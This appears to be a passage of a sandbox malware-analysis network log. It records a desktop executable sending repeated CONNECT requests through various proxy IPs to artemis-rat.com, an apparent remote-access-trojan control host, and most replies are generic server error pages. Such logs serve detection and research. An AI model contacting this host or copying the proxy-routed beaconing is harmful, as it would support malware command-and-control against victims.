                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.615470886 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 715
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2157192.168.2.55151264.56.150.10231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.223490953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2158192.168.2.55516814.241.203.4656783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.259402990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2159192.168.2.55533770.166.167.55577453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.259579897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2160192.168.2.55334638.41.53.14990903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.262116909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.623689890 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2161192.168.2.55324641.57.6.3060603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.265206099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2162192.168.2.555002185.5.209.101803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.273366928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.579030037 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.241755962 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.169958115 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:10.005670071 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:13.683154106 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@exam
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.346360922 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@exam
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.023890018 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:28.366847038 CET749INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.56 (Win64) OpenSSL/3.0.8 mod_jk/1.2.43
                                                                                                                                                                                                                                                            Content-Length: 530
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:43.033998966 CET749INHTTP/1.1 500 Internal Server Error
